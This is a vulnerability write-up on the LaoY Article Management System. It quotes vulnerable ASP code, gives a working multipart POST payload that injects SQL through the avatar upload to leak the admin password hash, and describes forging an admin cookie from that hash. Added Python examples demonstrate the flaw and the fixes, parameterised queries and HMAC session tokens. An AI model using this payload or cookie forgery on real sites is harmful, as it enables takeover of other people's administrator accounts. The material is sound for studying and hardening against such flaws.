Affected versions: 2.5 and 3.0 (Access edition); other versions not confirmed.
File: User/Upload.asp
Lines 34-50:
if Uprequest.form("file_Err") <> 0 then
    select case Uprequest.form("file_Err")
        case 1: str = "<div style=""padding-top:5px;padding-bottom:5px;""><font color=blue>" & Uprequest.maxSize/1024 & "K [<a href=javascript:history.go(-1)>re-upload</a>]</font></div>"
        case 2: str = "<div style=""padding-top:5px;padding-bottom:5px;""><font color=blue>the file format is incorrect [<a href=javascript:history.go(-1)>re-upload</a>]</font></div>"
        case 3: str = "<div style=""padding-top:5px;padding-bottom:5px;""><font color=blue>the file is too large and the format is incorrect [<a href=javascript:history.go(-1)>re-upload</a>]</font></div>"
    end select
    response.write str
else
    ' After the avatar is uploaded successfully, write its path into the UserFace field.
    ' Vulnerable: the "file" form field is concatenated straight into the UPDATE statement.
    SQL = "Update " & tbname & "_User set UserFace='" & Uprequest.Form("file") & "' where ID=" & LaoYID
    conn.execute(SQL)
    response.write "<script language=""javascript"">parent.UserReg.UserFace.value='" & Uprequest.Form("file") & "';"
    response.write "</script>"
    response.write "<div style=""margin-top:6px;""><font color=red>upload successful</font>. Refresh the page to view the new avatar. <a href=javascript:history.go(-1)>re-upload</a></div>"

    conn.close
    set conn = nothing
end if
Lines 60-67:
' generate the avatar thumbnail
' Note: if the suffix is not .gif, the uploaded avatar is resized (width and height) by the Persits.Jpeg code below,
' so to get the upload through cleanly, give the file a .gif name and this branch is skipped.
If right(RV_img, 4) <> ".gif" then
    Dim S_Width, S_Height, H_Temp, W_Temp
    S_Width = 100
    S_Height = 100
    Set Jpeg = Server.CreateObject("Persits.Jpeg")   ' create an instance
    Path = Server.MapPath(RV_img)                     ' physical path of the image
    Jpeg.Open Path                                    ' open the image
The avatar-upload request was captured with the Firefox LiveHTTPHeaders plug-in; the request headers are omitted here. The key point is the DLookUp function and how to use it (look it up on Baidu or Google if it is unfamiliar). Both parts are named "file": the first is the uploaded file itself, the second is the text value that Uprequest.Form("file") returns and that reaches the SQL statement. That value closes the UserFace string, sets Email to the admin row's password hash read from the same Access database, and re-opens a string for Sex so the UPDATE stays syntactically valid.
Send the following POST body:
-----------------------------4827543632391
Content-Disposition: form-data; name="file"; filename="c:\1.gif"

GIF87a
123123123123123123123

-----------------------------4827543632391
Content-Disposition: form-data; name="file"

abc',Email=DLookUp('admin_pass','Yao_admin','Id=1'),Sex='0

-----------------------------4827543632391
Content-Disposition: form-data; name="submit"

Submit
-----------------------------4827543632391--
After the response comes back, your Email field now holds the administrator's MD5 password hash. The author of the LaoY Article Management System changed MD5.asp so that only the first 16 characters of the MD5 are stored, so the ciphertext cannot be cracked with the usual tools. That does not matter: the admin check below accepts the stored hash straight from the cookie, so an attacker can log in to the backend with a forged cookie carrying the leaked hash. Note that the visible check also compares the row's Admin_IP against GetIP, so the forged cookie has to satisfy that comparison as well.
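The following is an added example, not code from the page or from the LaoY CMS, showing the injection from Upload.asp line 10 and the fix side by side. It uses an in-memory SQLite database as a stand-in for the Access file, with the table and column names from the page (tbname = "Yao"); because SQLite has no DLookUp, the payload uses the equivalent scalar subquery. The admin hash and user row are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the CMS database (SQLite instead of Access).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Yao_User  (ID INTEGER, UserFace TEXT, Email TEXT, Sex TEXT);
        CREATE TABLE Yao_Admin (Id INTEGER, Admin_Name TEXT, Admin_Pass TEXT);
        INSERT INTO Yao_User  VALUES (7, 'UserFace/7.gif', 'user@example.com', '1');
        INSERT INTO Yao_Admin VALUES (1, 'admin', '0192023a7bbd7325');  -- constructed 16-char hash
    """)
    return db

# The page's payload, written for Jet/Access:
JET_PAYLOAD = "abc',Email=DLookUp('admin_pass','Yao_admin','Id=1'),Sex='0"
# Same payload for this SQLite stand-in: a scalar subquery replaces DLookUp.
PAYLOAD = "abc',Email=(SELECT Admin_Pass FROM Yao_Admin WHERE Id=1),Sex='0"

def vulnerable_update(db, file_field, laoy_id):
    # Mirrors Upload.asp: the form value is concatenated into the UPDATE,
    # so the attacker controls every SET clause after the first.
    sql = ("UPDATE Yao_User SET UserFace='" + file_field
           + "' WHERE ID=" + str(laoy_id))
    db.execute(sql)
    return sql

def hardened_update(db, file_field, laoy_id):
    # Parameterised statement: the value can only ever become the UserFace
    # column's content, however many quotes or commas it contains.
    db.execute("UPDATE Yao_User SET UserFace=? WHERE ID=?", (file_field, laoy_id))

def user_row(db, laoy_id):
    cur = db.execute("SELECT UserFace, Email, Sex FROM Yao_User WHERE ID=?", (laoy_id,))
    face, email, sex = cur.fetchone()
    return {"UserFace": face, "Email": email, "Sex": sex}

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_update(db, PAYLOAD, 7))
    print("after injection:", user_row(db, 7))
    db = make_db()
    hardened_update(db, PAYLOAD, 7)
    print("parameterised:  ", user_row(db, 7))
```

With the concatenated statement the Email column ends up holding the admin hash; with the parameterised statement the whole payload is stored verbatim in UserFace and nothing else changes.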
File: Admin/admin_check.asp
<%
Dim LaoYAdminID, LaoYAdminName, LaoYAdminPass, IsAdmin, rs5
' too weak: the cookie carries the stored password hash itself
LaoYAdminID = LaoYRequest(Request.Cookies("LaoYAdmin")("UserID"))
LaoYAdminName = CheckStr(Request.Cookies("LaoYAdmin")("UserName"))
LaoYAdminPass = CheckStr(Request.Cookies("LaoYAdmin")("UserPass"))

If LaoYAdminID <> "" and LaoYAdminName <> "" and LaoYAdminPass <> "" then
    set rs5 = server.CreateObject("adodb.recordset")
    SQL = "Select Top 1 * from [" & tbname & "_Admin] where id=" & LaoYAdminID & " and Admin_Pass='" & LaoYAdminPass & "' and Admin_Name='" & LaoYAdminName & "'"
    on error resume next
    rs5.open SQL, conn, 1, 1
    Dim myadminid, myadminpass, myadminuser
    myadminid = rs5("ID")
    myadminpass = rs5("Admin_Pass")
    myadminuser = rs5("Admin_Name")
    myadminip = rs5("Admin_IP")
    yaomight = rs5("AdminMight")
    yaoadmintype = rs5("AdminType")
    yaoadpower = rs5("ADPower")
    yaoWritePower = rs5("WritePower")
    yaoManagePower = rs5("ManagePower")
    rs5.close
    set rs5 = nothing
    ' too weak: a cookie holding the leaked hash passes this comparison unchanged
    If myadminid <> Int(LaoYAdminID) or myadminpass <> LaoYAdminPass or myadminuser <> LaoYAdminName or myadminip <> GetIP Then
        IsAdmin = 0
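The following is an added example, not code from the page or from the LaoY CMS, contrasting the cookie check in admin_check.asp with a server-signed session token. The admin row, the server secret and the cookie values are constructed; the point is that in the weak design the stored hash is itself the credential, so whoever reads it out of the Email column (as above) is an administrator, whereas a token bound to a server-side HMAC key cannot be produced from anything in the database.

```python
import hmac
import hashlib

# Constructed admin row, shaped like the [Yao_Admin] row the check reads.
ADMIN = {"ID": 1, "Admin_Name": "admin", "Admin_Pass": "0192023a7bbd7325"}

# Assumption: a secret that lives only on the server, never in the database.
SERVER_SECRET = b"constructed-demo-secret-rotate-me"

def weak_check(cookie):
    """Mirrors admin_check.asp: UserID, UserName and UserPass come from the
    cookie and are compared with the row. UserPass is the stored hash, so a
    leaked hash is a valid login (the IP comparison is left out here)."""
    return (cookie.get("UserID") == str(ADMIN["ID"])
            and cookie.get("UserName") == ADMIN["Admin_Name"]
            and cookie.get("UserPass") == ADMIN["Admin_Pass"])

def _mac(admin_id, name, exp):
    msg = f"{admin_id}|{name}|{exp}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def issue_token(admin_id, name, now, ttl=3600):
    """Issued only after a real password check; carries no password material."""
    exp = int(now) + ttl
    return f"{admin_id}|{name}|{exp}|{_mac(admin_id, name, exp)}"

def strong_check(token, now):
    """Accepts the token only if the HMAC verifies under the server secret,
    the expiry has not passed, and the identity matches the admin row."""
    try:
        admin_id, name, exp, mac = token.split("|")
        exp_i = int(exp)
    except ValueError:
        return False
    if not hmac.compare_digest(mac, _mac(admin_id, name, exp)):
        return False
    if int(now) >= exp_i:
        return False
    return admin_id == str(ADMIN["ID"]) and name == ADMIN["Admin_Name"]

# Forged cookie built from the hash leaked through the Email field.
FORGED_COOKIE = {"UserID": "1", "UserName": "admin", "UserPass": "0192023a7bbd7325"}

if __name__ == "__main__":
    print("weak check, leaked hash:  ", weak_check(FORGED_COOKIE))
    tok = issue_token(1, "admin", now=1_700_000_000)
    print("strong check, real token: ", strong_check(tok, now=1_700_000_100))
    # Attacker knows everything in the database but not SERVER_SECRET.
    fake = "1|admin|9999999999|" + hashlib.sha256(b"0192023a7bbd7325").hexdigest()
    print("strong check, forged:     ", strong_check(fake, now=1_700_000_100))
```

The token format is deliberately plain; any session scheme works as long as the secret that authenticates it is not something the database can leak, and the comparison uses a constant-time function.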